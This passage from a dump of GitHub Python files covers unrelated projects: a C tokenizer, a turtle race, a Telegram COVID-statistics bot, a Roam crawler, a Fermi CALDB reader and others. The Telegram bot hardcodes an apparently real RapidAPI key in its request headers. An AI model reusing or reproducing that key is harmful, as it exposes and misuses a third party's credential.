model, x):\n pass\n\n\nclass DistBasedAssessor(PredictorCompetenceAssessor):\n \"\"\"\n a competence assessor using distribution of deriviation cohort\n \"\"\"\n def __init__(self, models):\n super().__init__(models=models)\n\n def evaluate(self, model, x, var='age'):\n val = x[var]\n dist = model.model_data['cohort_variable_distribution']\n m_var = dist[var]['median']\n var_range = dist[var]['h25'] - dist[var]['l25']\n delta = 0 if dist[var]['l25'] <= val <= dist[var]['h25'] else min(abs(val - m_var) / var_range, 1)\n # delta = abs(val - m_var) / var_range\n competence = 1 - delta\n return competence\n","repo_name":"Honghan/EnsemblePrediction","sub_path":"model_ensemble.py","file_name":"model_ensemble.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"69975224252","text":"import re\nimport streamlit as st\nimport pandas as pd\n\nclass CTokenizer:\n def __init__(self):\n # Define keywords and punctuators\n self.keywords = [\n 'auto', 'break', 'case', 'char', 'const', 'continue', 'default', 'do',\n 'double', 'else', 'enum', 'extern', 'float', 'for', 'goto', 'if', 'int',\n 'long', 'register', 'return', 'short', 'signed', 'sizeof', 'static',\n 'struct', 'switch', 'typedef', 'union', 'unsigned', 'void', 'volatile',\n 'while'\n ]\n self.punctuators = [\n '{', '}', '[', ']', '(', ')', '.', '->', '++', '--', '&', '*', '+', '-',\n '~', '!', '/', '%', '<<', '>>', '<', '>', '<=', '>=', '==', '!=', '^',\n '|', '&&', '||', '?', ':', ';', '...', '=', '*=', '/=', '%=', '+=', '-=',\n '<<=', '>>=', '&=', '^=', '|=', ','\n ]\n\n # Build the regular expression patterns\n self.keyword_pattern = r'\\b(?:{})\\b'.format('|'.join(map(re.escape, self.keywords)))\n self.identifier_pattern = r'\\b([a-zA-Z_][a-zA-Z0-9_]*)\\b'\n self.constant_pattern = r'\\b([0-9]+)\\b'\n self.string_literal_pattern = r'\"([^\"\\\\]*(?:\\\\.[^\"\\\\]*)*)\"'\n self.punctuator_pattern = r'({})'.format('|'.join(map(re.escape, self.punctuators)))\n\n def tokenize_c_program(self, c_program):\n tokens = []\n # Remove comments by replacing them with whitespace\n c_program = re.sub(r'(\\/\\*[\\s\\S]*?\\*\\/|\\/\\/.*)', lambda m: ' ' * len(m.group()), c_program)\n \n # Tokenize the program\n patterns = [\n (self.keyword_pattern, 'KEYWORD'),\n (self.identifier_pattern, 'IDENTIFIER'),\n (self.constant_pattern, 'CONSTANT'),\n (self.string_literal_pattern, 'STRING_LITERAL'),\n (self.punctuator_pattern, 'PUNCTUATOR')\n ]\n \n for pattern, token_type in patterns:\n for match in re.finditer(pattern, c_program):\n tokens.append({'Type': token_type, 'Value': match.group()})\n \n return tokens\n\n\n\ndef main():\n st.title(\"C Tokenizer\")\n uploaded_file = st.file_uploader(\"Upload a .c file\", type=[\"c\"])\n\n if uploaded_file is not None:\n c_program = uploaded_file.read().decode(\"utf-8\")\n tokenizer = CTokenizer()\n tokens = tokenizer.tokenize_c_program(c_program)\n st.header(\"Tokens\")\n df = pd.DataFrame(tokens)\n st.dataframe(df)\n if st.button(\"Export Tokens\"):\n export_data = df.to_string(index=False)\n export_filename = \"c_tokens.txt\"\n st.download_button(\n label=\"Download Tokens\",\n data=export_data,\n file_name=export_filename,\n mime=\"text/plain\"\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tanishpatel0106/LLM_Code_Vulnerabilty","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25674790371","text":"from turtle import Turtle, Screen\nimport random\n\nrace_is_on = False\nscreen = Screen()\nscreen.screensize(500, 500)\nmichy = Turtle()\nraph = Turtle()\nleo = Turtle()\ndonny = Turtle()\nmichy.color(\"Orange\")\nraph.color(\"Red\")\nleo.color(\"Blue\")\ndonny.color(\"Indigo\")\nturtle_dict = {\"Michy\": michy, \"Raph\": raph, \"Leo\": leo, \"Donny\": donny}\nuser_bet = Screen().textinput(title=\"Place your bet\", prompt=\"Select one of them (Michy/Raph/Leo/Donny): \")\nif user_bet.lower() == \"michy\" or user_bet.lower() == \"raph\" or user_bet.lower() == \"leo\" or user_bet.lower() == \"donny\":\n race_is_on = True\nelse:\n print(\"Invalid Input\")\n\n\ndef turtle_pos(t, x, y):\n t.shape(\"turtle\")\n t.speed(0)\n t.hideturtle()\n t.penup()\n t.setpos(x, y)\n t.showturtle()\n\n\n# def check_bet():\n# if user_bet:\n# # print(f\"{keys} won the race!\")\n# return False\n# else:\n# return True\n\n\nturtle_pos(michy, -300, 200)\nturtle_pos(raph, -300, 50)\nturtle_pos(leo, -300, -100)\nturtle_pos(donny, -300, -250)\n# print(michy.xcor())\n\nwhile race_is_on:\n for key, value in turtle_dict.items():\n if value.xcor() >= 300:\n race_is_on = False\n if key.lower() == user_bet.lower():\n print(\"You have won the bet!\")\n else:\n print(\"You have lost the bet.\")\n print(f\"{key} won the race.\")\n value.forward(random.randrange(0, 10))\n # check_finish_line(turtle_dict)\n\nscreen.exitonclick()\n","repo_name":"ErfanDipto/Python_Projects","sub_path":"Turtle_Race(Day_19)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23677920110","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\n \nplt.style.use('default')\nsns.set()\nsns.set_style('whitegrid')\nsns.set_palette('Set1')\n\n#x = np.array([0, 2, 4, 6, 8, 10])\nscore_list1 = [0.3, 1.2, 1.3, 1.8, 1.7, 1.5]\nscore_list2 = [2.1, 2.4, 2.3, 2.1, 2.2, 2.1, 33]\ngene_1 = np.array(score_list1)\ngene_2 = np.array(score_list2)\n\n# plot graph\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\n# plot\n#ax.plot(x, gene_1, label='player1(left)')\n#ax.plot(x, gene_2, label='player2(right)')\nax.plot(gene_1, label='player1(left)')\nax.plot(gene_2, label='player2(right)')\n# set label\nax.legend()\nax.set_xlabel(\"time[sec]\")\nax.set_ylabel(\"score\")\n# set ylim\nmax_score = max(max(score_list1), max(score_list2))\nmax_score = (max_score+1)//1 # clip\nax.set_ylim(0, max_score)\n# show\nplt.show()\n","repo_name":"seigot/tools","sub_path":"tetris/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32316107289","text":"import http.client\r\nimport re\r\nimport telebot\r\nimport config\r\ndef maindata():\r\n conn = http.client.HTTPSConnection(\"vaccovid-coronavirus-vaccine-and-treatment-tracker.p.rapidapi.com\")\r\n headers = {\r\n 'x-rapidapi-key': \"06a132a9bbmsh4b2b32d05bbd0d5p1615f3jsn5cc43401ee3c\",\r\n 'x-rapidapi-host': \"vaccovid-coronavirus-vaccine-and-treatment-tracker.p.rapidapi.com\"\r\n }\r\n conn.request(\"GET\", \"/api/npm-covid-data/europe\", headers=headers)\r\n res = conn.getresponse()\r\n data = res.read()\r\n data1 = data.decode(\"utf-8\")\r\n return data1\r\ndef getcases(st):\r\n data1 = maindata()\r\n if data1.find(st) != -1 and st != '':\r\n country = re.search(st, data1)\r\n pochcontr = country.start()\r\n data = data1[pochcontr:]\r\n cases = re.search('TotalCases', data)\r\n poch = cases.start()\r\n res = ''\r\n allres = ''\r\n s1 = True\r\n i = 0\r\n while s1 == True:\r\n if (data[i + poch] == ':'):\r\n i += 1\r\n while True:\r\n if data[i + poch] == ',':\r\n s1 = False\r\n break\r\n res += data[i + poch]\r\n i += 1\r\n allres = st + ' total cases: ' + res\r\n i += 1\r\n\r\n else:\r\n allres = 'incorrect data'\r\n return allres\r\nbot = telebot.TeleBot(config.TOKEN)\r\n@bot.message_handler(commands=['start'])\r\ndef a(message):\r\n bot.send_message(message.chat.id,'/help - справка')\r\n@bot.message_handler(commands=['give5'])\r\ndef a(message):\r\n bot.send_message(message.chat.id,getcases('France') + '\\n' + getcases('Russia') + '\\n' + getcases('UK') + '\\n' + getcases('Italy') + '\\n' + getcases('Hungary'))\r\n text = '\\n'+getcases('France') + '\\n' + getcases('Russia') + '\\n' + getcases('UK') + '\\n' + getcases('Italy') + '\\n' + getcases('Hungary')\r\n file=open('info.txt','a')\r\n file.write(text)\r\n file.close()\r\n@bot.message_handler(commands=['help'])\r\ndef a(message):\r\n bot.send_message(message.chat.id, '/give5 - 5 країн\\nдля пошуку окремих країн, надішліть мені назву країни з великої букви на англійській\\n/save - створення файлу з історією\\n/removedata - стирає історію')\r\n@bot.message_handler(commands=['save'])\r\ndef a(message):\r\n file=open('info.txt','rb')\r\n bot.send_document(message.chat.id, file)\r\n@bot.message_handler(commands=['removedata'])\r\ndef a(message):\r\n file = open('info.txt', 'w')\r\n file.write(' ')\r\n file.close()\r\n bot.send_message(message.chat.id,'видалено')\r\n@bot.message_handler(content_types=['text'])\r\ndef a(message):\r\n mes = message.text\r\n if getcases(mes)!='incorrect data':\r\n bot.send_message(message.chat.id,getcases(mes))\r\n text='\\n'+getcases(mes)\r\n file=open('info.txt','a')\r\n file.write(text)\r\n file.close()\r\n else:\r\n bot.send_message(message.chat.id, 'невірні дані')\r\nbot.polling(none_stop=True)\r\n\r\n\r\n\r\n","repo_name":"Boryslavsky/prak","sub_path":"task4/prak5.py","file_name":"prak5.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8458298100","text":"\"\"\"\nDownloads and parses some public databases from `https://github.com/br-g/roam-public-db`.\nParsing is done using my new Python package: pyroaman (https://github.com/br-g/pyroaman).\n\nIf you think some other databases should be added, please suggest it on Slack or\ncreate a Github issue.\n\"\"\"\n\nfrom typing import Iterator, Dict\nimport tempfile\nimport shutil\nfrom datetime import datetime\nfrom pathlib import Path\nfrom six.moves import urllib\nimport pytz\nfrom loguru import logger\nimport click\nfrom tqdm import tqdm\nimport pyroaman\nfrom roam_sanity.util import save_as_json\n\n\nDATABASES = [\n 'help',\n 'roamhacker',\n]\n\nparsing_time = datetime.now().astimezone(pytz.utc).isoformat()\n\n\ndef download_database(db_id: str) -> pyroaman.database:\n url = f'https://raw.githubusercontent.com/br-g/roam-public-db/main/json/{db_id}.json'\n dirpath = Path(tempfile.mkdtemp())\n filepath = dirpath / 'db.json'\n\n urllib.request.urlretrieve(url, filepath)\n db = pyroaman.load(filepath)\n shutil.rmtree(dirpath)\n\n return db\n\n\ndef timestamp_to_iso(timestamp: int) -> str:\n timestamp /= 1000 # type: ignore\n return datetime.fromtimestamp(timestamp).astimezone(pytz.utc).isoformat()\n\n\ndef render_block_content(block: 'pyroaman.Block') -> str:\n \"\"\"Generates some HTML\"\"\"\n html = block.string\n html += '
      '\n for child in block.children:\n html += '
    • ' + render_block_content(child) + '
    • '\n html += '
    '\n return html\n\n\ndef render_page_content(page: 'pyroaman.Block') -> str:\n \"\"\"Generates some HTML\"\"\"\n html = '
      '\n for child in page.children:\n html += '
    • ' + render_block_content(child) + '
    • '\n html += '
    '\n return html\n\n\ndef parse_database(db_id: str, db: pyroaman.database) -> Iterator[Dict]:\n for page in tqdm(db.pages):\n if 'uid' not in page.metadata:\n continue\n if not page.text:\n continue\n\n res = {\n 'source': 'roam-research',\n 'database': db_id,\n 'parsing_time': parsing_time,\n 'title': page.string,\n 'url': f\"https://roamresearch.com/#/app/{db_id}/page/{page.metadata['uid']}\",\n 'text': render_page_content(page)\n }\n if 'create-time' in page.metadata:\n res['create_time'] = timestamp_to_iso(page.metadata['create-time'])\n if 'edit-time' in page.metadata:\n res['edit_time'] = timestamp_to_iso(page.metadata['edit-time'])\n\n yield res\n\n\n@click.command()\ndef main():\n for db_id in DATABASES:\n logger.info(f'Downloading `{db_id}`')\n db = download_database(db_id)\n\n logger.info(f'Parsing `{db_id}`')\n parsed = list(parse_database(db_id, db))\n logger.info(f'Collected {len(parsed)} pages')\n\n logger.info(f'Saving `{db_id}`')\n for p in parsed:\n save_as_json(p)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"br-g/roam-sanity-preserver","sub_path":"scripts/crawl_roam.py","file_name":"crawl_roam.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"69925239612","text":"#!/usr/bin/env python3\n\nfrom time import sleep\nimport socket\nimport netsync\nimport netsync.rtp\n\ncast = \"broad\"\nprint(\"{}cast\".format(cast))\nif cast == \"uni\":\n\tgroup = \"10.0.0.150\"\nelif cast == \"broad\":\n\tgroup = \"255.255.255.255\"\nelif cast == \"multi\":\n\tgroup=\"224.69.69.1\"\n\tttl = 1\nport = 6969\n\nsock = netsync.rtp.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 2)\nif cast == \"multi\":\n\tsock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)\nelif cast == \"broad\":\n\tsock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n\n#sock.connect((group,port))\nfor t in range(10):\n\to=str(t).encode()\n\tprint(\"sending {}\".format(t))\n\tsock.sendto(o,(group,port))\n\tsleep(0.1)\n\n# send(bytes, flags)\n# sendall(bytes, flags)\n# sendto(bytes, address)\n# sendto(bytes, flags, address)\n# sendmsg(buffers, ancdata, flags, address)\n","repo_name":"jdimpson/netsync","sub_path":"t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29297636776","text":"from django.shortcuts import render, HttpResponseRedirect, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\nfrom .form import TickerForm, GroupForm, PortFolioForm\n\nimport datetime\n\n\n@login_required\ndef validate_create_ticker_form(request):\n form = TickerForm(request.POST or None)\n if form.is_valid():\n ticker = form.save()\n ticker.update_ticker_data(request)\n ticker.updated = datetime.datetime.now()\n ticker.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required\ndef validate_create_group_form(request):\n form = GroupForm(request.POST or None)\n if form.is_valid():\n form.save()\n\n return redirect('portfolio:ticker_list_view')\n\n\n@login_required\ndef validate_portfolio_create_form(request):\n form = PortFolioForm(request.POST or None, initial={'user': request.user})\n if form.is_valid():\n new_portfolio = form.save()\n return HttpResponseRedirect(new_portfolio.get_absolute_url())\n return redirect('portfolio:portfolio_list_view')\n","repo_name":"Zefarak/finace-app","sub_path":"tickers/validate_views.py","file_name":"validate_views.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"793465899","text":"import subprocess\n\nfrom setuptools import setup, find_packages\n\nVERSION_NUMBER = \"1.2.8\"\n\ntry:\n GIT_BRANCH = subprocess.check_output([\"git\", \"rev-parse\", \"--abbrev-ref\", \"HEAD\"])\n GIT_BRANCH = GIT_BRANCH.decode() # convert to standard string\n GIT_BRANCH = GIT_BRANCH.rstrip() # remove unnecessary whitespace\nexcept:\n GIT_BRANCH = \"master\"\n\nif GIT_BRANCH == \"master\":\n DEVELOPMENT_STATUS = \"Development Status :: 5 - Production/Stable\"\n VERSION_NAME = VERSION_NUMBER\nelif GIT_BRANCH == \"beta\":\n DEVELOPMENT_STATUS = \"Development Status :: 4 - Beta\"\n VERSION_NAME = \"%s-beta\" % VERSION_NUMBER\nelif GIT_BRANCH == \"dev\":\n DEVELOPMENT_STATUS = \"Development Status :: 3 - Alpha\"\n VERSION_NAME = \"%s-dev\" % VERSION_NUMBER\nelse:\n print(\"Unknown git branch, using pre-alpha as default\")\n DEVELOPMENT_STATUS = \"Development Status :: 2 - Pre-Alpha\"\n VERSION_NAME = \"%s-%s\" % (VERSION_NUMBER, GIT_BRANCH)\n\n\ndef readme_type() -> str:\n import os\n if os.path.exists(\"README.rst\"):\n return \"text/x-rst\"\n if os.path.exists(\"README.md\"):\n return \"text/markdown\"\n\n\ndef readme() -> [str]:\n with open('README.rst') as f:\n return f.read()\n\n\ndef install_requirements() -> [str]:\n return read_requirements_file(\"requirements.txt\")\n\n\ndef test_requirements() -> [str]:\n return read_requirements_file(\"test_requirements.txt\")\n\n\ndef read_requirements_file(file_name: str):\n with open(file_name, encoding='utf-8') as f:\n requirements_file = f.readlines()\n return [r.strip() for r in requirements_file]\n\n\nsetup(\n name='raspyrfm_client',\n version=VERSION_NAME,\n description='A library to send rc signals with the RaspyRFM module',\n long_description=readme(),\n long_description_content_type=readme_type(),\n license='GPLv3+',\n author='Markus Ressel',\n author_email='mail@markusressel.de',\n url='https://github.com/markusressel/raspyrfm-client',\n packages=find_packages(exclude=['tests']),\n classifiers=[\n DEVELOPMENT_STATUS,\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7'\n ],\n install_requires=install_requirements(),\n tests_require=test_requirements()\n)\n","repo_name":"markusressel/raspyrfm-client","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"8738647345","text":"\"\"\"\nModule to provide access to CALDB information\n\n$Header: /nfs/slac/g/glast/ground/cvs/pointlike/python/uw/irfs/caldb.py,v 1.5 2018/01/27 15:35:06 burnett Exp $\nAuthor: Eric Wallace\n\n\"\"\"\n__version__ = '$Revision: 1.5 $'\n\nimport os\n\nimport numpy as np\nfrom astropy.io import fits\n\nfrom uw.utilities import keyword_options\nfrom . import IrfError\n\nclass CALDBError(IrfError):\n pass\n\nclass CALDB(object):\n\n \"\"\"An object to keep track of the LAT CALDB information.\n \n Parameters\n ----------\n CALDB_dir\n Path to CALDB directory. Environment variables will be expanded.\n Defaults to $CALDB. The specified directory must have a\n subdirectory 'data/glast/lat', containing a CALDB index file\n named 'caldb.indx'. \n\n Attributes\n ----------\n CALDB_dir\n Absolute path to the directory specified by the `CALDB_dir` init\n parameter.\n index\n FITS HDU containing CALDB index data\n\n Methods\n -------\n list_irfs\n Prints a list of available irfs from the CALDB index, optionally\n filtered by selections specified with the same keyword arguments\n as __call__.\n \"\"\"\n\n event_type_names = ('front','back', 'psf0','psf1','psf2','psf3','edisp0',\n 'edisp1','edisp2','edisp3')\n event_type_partitions = dict(fb = ('front','back'),\n psf = ('psf0','psf1','psf2','psf3'),\n edisp = ('edisp0','edisp1','edisp2','edisp3'))\n\n event_type_partitions = dict(fb = (0,1),\n psf = (2,3,4,5),\n edisp = (6,7,8,9))\n def __init__(self,CALDB_dir, irfname):\n self.CALDB_dir = os.path.abspath(os.path.expandvars(CALDB_dir))\n self.index = self._load_caldb_index()\n self.irf=irfname\n t = self.irf.split('_')\n self.event_class=t[1]\n self.version = t[0]+'_'+t[2]\n \n def __repr__(self):\n return \"{self.__class__}\\n CALDB_dir: {self.CALDB_dir},\\\n \\n event_class: {self.event_class} \\n version : {self.version}\".format(self=self)\n\n def _load_caldb_index(self):\n if not os.path.exists(self.CALDB_dir):\n raise CALDBError('CALDB directory {} not found.'.format(self.CALDB_dir))\n index_file = os.path.join(self.CALDB_dir,'data','glast','lat','caldb.indx')\n if os.path.exists(index_file):\n return fits.getdata(index_file,'CIF')\n elif os.path.exists(os.path.join(self.CALDB_dir,'caldb.indx')):\n return fits.getdata(os.path.join(self.CALDB_dir,'caldb.indx'),'CIF')\n raise CALDBError('No CALDB index found in {}'.format(self.CALDB_dir))\n \n def filenames(self, irf):\n \"\"\" for compatibility with old code: return a list of filenames in order fb,psf\n \"\"\"\n return [self(irf, event_type=et)['filename'] for et in range(6)] \n \n def get_aeff(self):\n return self.filenames('aeff')\n def get_psf(self,):\n return self.filenames('psf')\n\n def __call__(self,irf,version=None,event_class=None,event_type='fb'):\n \"\"\"Return the filenames and FITS extensions for a given irf.\n \n Parameters\n ----------\n\n irf : {'psf','aeff','edisp'}\n The IRF to find files for.\n version : str\n IRF version to look up files for (e.g., 'P6_V1','P7_V6',\n 'P7REP_V6','P8R2_V15'). Default is \"P8R2_V6\".\n event_class : str\n Event class selection to find IRFs for (e.g., \"source\", \"clean\",\n \"diffuse\"). Default is \"source\". Bitmask values are not currently\n recognized.\n event_type : str or int\n Event type ('front','back','psf0', etc) to find files for. Integer\n indices are also accepted (0-9 for ('front', 'back', 'psf0', ...,\n 'edisp3'), respectively). May also be one of ('fb','psf','edisp'),\n in which case information will be returned for all event types in\n the specified set. Default is 'fb'.\n\n Returns\n -------\n\n irf_info : dict\n If a single event type is requested, the return value is a dict\n with keys \"filename\" and \"extensions\". \"filename\" is the path to\n the FITS file containing the description of the requested IRF.\n \"extensions\" is another dict in which the keys and values are the\n names and extensions numbers for each of the FITS extensions for\n the specified irf (e.g., 'RPSF', 'PSF_SCALING', and 'FISHEYE_CORR'\n for the PSF file). \n\n If multiple event types are requested, the return value is a dict\n in which the keys are the event type names and the values are dicts\n of the form described above.\n \"\"\"\n # First use default values\n if version is None: version = self.version\n if event_class is None: event_class=self.event_class\n\n irf_entries = self._filter(irf=irf, version=version,\n event_class=event_class, event_type=event_type)\n def irf_dict(entries):\n #Assume all entries passed to this function are for the same file.\n filename = os.path.join(self.CALDB_dir,entries[0]['CAL_DIR'],\n entries[0]['CAL_FILE'])\n extensions = {cname:extension for cname,extension in \n zip(entries['CAL_CNAM'],entries['CAL_XNO'])}\n return dict(filename=filename,extensions=extensions)\n\n ets = np.asarray(self._parse_event_type(np.char.strip(irf_entries['DETNAM'])))\n ets_unique = np.unique(ets)\n if ets_unique.shape[0]==1:\n return irf_dict(irf_entries)\n else:\n return {et:irf_dict(irf_entries[ets==et]) for et in ets_unique}\n \n if event_type is not None:\n event_type = self._parse_event_type(event_type)\n if hasattr(event_type,'__iter__'):\n return {et:irf_dict(et) for et in event_type}\n else:\n return irf_dict(event_type)\n \n def _filter(self,irf=None,version=None,event_class=None,event_type=None):\n \"\"\"Return CALDB index entries filtered according to the provided criteria.\"\"\"\n def _parse_filenames(filenames):\n filenames = np.char.rpartition(np.char.lower(filenames),'.')[:,0]\n #Add a missing underscore for the P7 irfs for easier processing\n for ec in ('transient','source','clean','ultraclean'):\n filenames = np.char.replace(filenames,'p7'+ec,'p7_'+ec)\n tokens = np.char.strip(np.vstack(np.char.split(filenames,'_')))\n p6mask = (tokens[:,1]=='p6')\n #Handle the reversed version/event class order for P6 irfs\n tokens[p6mask,2],tokens[p6mask,3] = tokens[p6mask,3],tokens[p6mask,2]\n irf,pass_ver,ec,ver,et = tokens.T\n ver = np.array(['_'.join(x) for x in zip(pass_ver,ver)])\n return irf,ver,ec\n\n mask = np.ones_like(self.index,dtype='bool') \n \n\n for val,selection in zip(_parse_filenames(self.index.CAL_FILE),(irf,version,event_class)):\n if selection is None:\n selection = val\n mask &= (val==np.char.lower(selection))\n\n if event_type is None:\n et = list(range(10))\n else:\n et = self._parse_event_type(event_type)\n if hasattr(et,\"__iter__\"):\n etmask = np.zeros_like(mask)\n for e in et:\n e = self.event_type_names[e]\n etmask |= (e==np.char.lower(np.char.strip(self.index.DETNAM)))\n else:\n et = self.event_type_names[et]\n etmask = (et==np.char.lower(np.char.strip(self.index.DETNAM)))\n\n mask &= etmask\n\n return self.index[mask]\n\n def _event_type_lookup(self,event_type):\n \"\"\"Find the event type or types for a given event_type selection\"\"\" \n if hasattr(event_type,'__iter__'):\n return [self._event_type_lookup(et) for et in event_type]\n try:\n et = event_type.lower()\n except AttributeError: #Not a string, assume index\n try:\n et = self.event_type_names[event_type]\n except IndexError:\n msg = \"Invalid event type index {}. Should be 0-9.\".format(\n event_type, self.event_type_names)\n raise IrfError(msg)\n\n if et in self.event_type_names:\n return et\n\n try:\n return self.event_type_partitions[et]\n except KeyError:\n raise IrfError(\"Invalid event type {}\".format(et))\n\n def _parse_event_type(self,event_type):\n \"\"\"Find the event type or types for a given event_type selection\"\"\" \n if hasattr(event_type,'__iter__'):\n return [self._parse_event_type(et) for et in event_type]\n\n try:\n event_type = event_type.lower()\n except AttributeError: #Not a string, assume index\n if event_type in range(10):\n return event_type\n else:\n raise IrfError(\"Invalid event type index {}. Should be 0-9.\".format(event_type))\n\n try:\n return self.event_type_names.index(event_type)\n except ValueError as exc:\n try: return self.event_type_partitions[event_type]\n except KeyError:\n raise exc\n\n def list_irfs(self,**selections):\n \"\"\"List available IRFs matching the given selections.\n\n Available selections are:\n\n version\n IRF version (e.g. 'P8R2_V6','P6_V3','P7REP_V6')\n event_class\n Event class (e.g. 'source','diffuse','clean')\n event_type_partition\n Event type partition (one of 'fb', 'psf', 'edisp').\n Overridden by event_type selection, if provided. \n Otherwise, all types of the selected partition are displayed.\n event_type\n Event type ('front','back','psf0', etc). Integer indices\n are also accepted (0-9 for ('front','back','PSF0',...,'EDISP3'))\n \"\"\"\n\n def _format_names(names,indent=2,width=100):\n \"\"\"Pretty print irf names in columns.\n\n irfnames\n Names to print.\n indent [2]\n Spaces to indent the list\n width [100]\n Total width of the display\n \"\"\"\n wordwidth = names.dtype.itemsize\n names = np.unique(['{:<{w}s}'.format(n,w=wordwidth) for n in names])\n names.sort()\n sep = ' '*4\n ncols = (width-indent)//(wordwidth+4)\n names = np.append(names,[' '*wordwidth]*(ncols-names.shape[0]%ncols))\n names = names.reshape(ncols,names.shape[0]//ncols).T\n return [' '*indent+sep.join(ns) for ns in names]\n\n entries = self._filter(**selections)\n if entries.shape[0]==0:\n print(\"No available IRFs matching the provided selections.\")\n return\n names = np.char.partition(entries.CAL_FILE,'_')[:,2]\n names = np.char.partition(names,'.')[:,0]\n if np.all([s is None for s in selections.values()]):\n st = 'Displaying all available IRFs:\\n'\n else:\n st = 'Displaying available IRFs with ' \n st += ', '.join(['{}={}'.format(k,v) for k,v in selections.items()\n if v is not None])\n st += \":\\n\"\n st += \"\\n\".join(_format_names(names))\n print(st)\n\n\n\n\n\n","repo_name":"fermi-lat/pointlike","sub_path":"python/uw/irfs/caldb.py","file_name":"caldb.py","file_ext":"py","file_size_in_byte":11722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22595146693","text":"from collections import OrderedDict\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom model import *\nimport flwr as fl\nimport sys\n\nDEVICE = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndef load_data(train_dir, test_dir):\n \"\"\"Load CIFAR-10 (training and test set).\"\"\"\n test = torch.load(test_dir)\n train = torch.load(train_dir)\n trainloader = DataLoader(train, batch_size=32, shuffle=True)\n testloader = DataLoader(test, batch_size=32)\n num_examples = {\"trainset\" : len(train), \"testset\" : len(test)}\n return trainloader, testloader, num_examples\n\nclass CifarClient(fl.client.NumPyClient):\n def get_parameters(self):\n return get_model_parameters(net)\n\n # def set_parameters(self, parameters):\n # params_dict = zip(net.state_dict().keys(), parameters)\n # state_dict = OrderedDict({k: torch.tensor(v) for k, v in params_dict})\n # net.load_state_dict(state_dict, strict=True)\n\n def fit(self, parameters, config):\n set_model_parameters(net, parameters)\n train(net, trainloader, epochs=1)\n return list(self.get_parameters()), num_examples[\"trainset\"], {\"accuracy\": 0}\n\n def evaluate(self, parameters, config):\n set_model_parameters(net, parameters)\n loss, accuracy = test(net, testloader)\n return float(loss), num_examples[\"testset\"], {\"accuracy\": float(accuracy)}\n\n\nif __name__ == \"__main__\":\n# Load model and data\n \n\n net = Net().to(DEVICE)\n test_dir = 'testing/test.pt'\n train_dir = 'training/train' + sys.argv[1] + '.pt'\n trainloader, testloader, num_examples = load_data(train_dir, test_dir)\n fl.client.start_numpy_client(\"10.128.0.2:5040\", client=CifarClient())\n #fl.client.start_numpy_client(\"localhost:8040\", client=CifarClient())","repo_name":"j2zhao/federated_learning","sub_path":"neural_network_simple/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74752424571","text":"import requests\nimport json\nimport tiktoken\nimport weaviate\nimport os\nimport openai\n\nfrom github import Github\nfrom github import Auth\nfrom github.ContentFile import ContentFile\nfrom weaviate.util import generate_uuid5\n\nfrom typing import Type, Optional\nfrom pydantic import BaseModel, Field\nfrom superagi.tools.base_tool import BaseTool\n\nclass RicaiCodestoreUpdateSchema(BaseModel):\n repository: str = Field(..., description=\"The Github repository to use for testing\")\n\nclass RicaiCodestoreUpdateTool(BaseTool):\n \"\"\"\n RicAI Update Database with latest code tool\n\n Attributes:\n name : The name.\n description : The description.\n args_schema : The args schema.\n \"\"\"\n name = \"RicaiCodestoreUpdate\"\n description = (\n \"A tool for updating the code database with latest code from Github.\"\n )\n args_schema: Type[RicaiCodestoreUpdateSchema] = RicaiCodestoreUpdateSchema\n\n class Config:\n arbitrary_types_allowed = True\n \n def __init__(self):\n \"\"\"\n Initializes the RicaiCodestoreHelper with the provided Weaviate and Github credentials.\n\n Args:\n Weaviate_url (str): weaviate database connection url.\n Weaviate_api_key (str): weaviate database connection API key.\n Openai_api_key (str): OpenAI API key.\n \"\"\"\n self.w_client = weaviate.Client(\n url=self.get_tool_config(\"WEAVIATE_URL\"),\n auth_client_secret=weaviate.AuthApiKey(\n 